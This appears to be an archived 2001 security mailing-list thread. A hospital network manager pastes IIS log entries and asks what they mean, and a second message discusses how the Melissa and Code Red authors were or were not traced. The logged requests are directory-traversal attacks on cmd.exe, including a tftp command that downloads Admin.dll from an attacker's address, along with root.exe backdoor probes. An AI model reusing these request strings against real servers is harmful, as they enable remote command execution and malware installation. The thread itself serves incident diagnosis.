All: I still have a script trying to run, but the location and folder doesn't exist. The is what I found in my log file: 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir, 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, If anybody knows what this is, please 'spain it to me. I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I inherited this, not my fault :-) ) In the event log I see this same type of message running every few minutes. The script is supposedly running from \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. Thanks... Mike Cuciti Network Service and Support MAnager Tuality Healthcare 681.1749 "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: >The Melissa author was caught because he posted the infectious document >from his own AOL account to a news group, rather than releasing it >through a hacked account. His guilt was confirmed when the serial number >in the document matched the PC in the dumpster outside his bedroom :-) No. He used a hacked acct. But we identified the exact time of the use of the acct (newsgroup posting message ID) and the FBI traced the phone records. And the PC was destroyed and never located. Where did you get your version of the story? >But Code Red and its derivatives is not an Office document, and >therefore has no serial numbers. That investigators appear to have no >leads months after Code Red appeared tells me that it was likely >released to the wild from a compromised machine, or perhaps >simultaneously released from multiple compromised machines. If the >author(s) were good, then those compromised machines were initially >attacked from other compromised machines. Likely all of these initial >release vector machines have long since been wiped and re-installed, and >the links to the author(s) have been cut. We have some "first instances" of traffic. I don't know what the FBI's doing with the information gathered so far. But I agree that it's difficult and not likely. Jimmy
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:38 PDT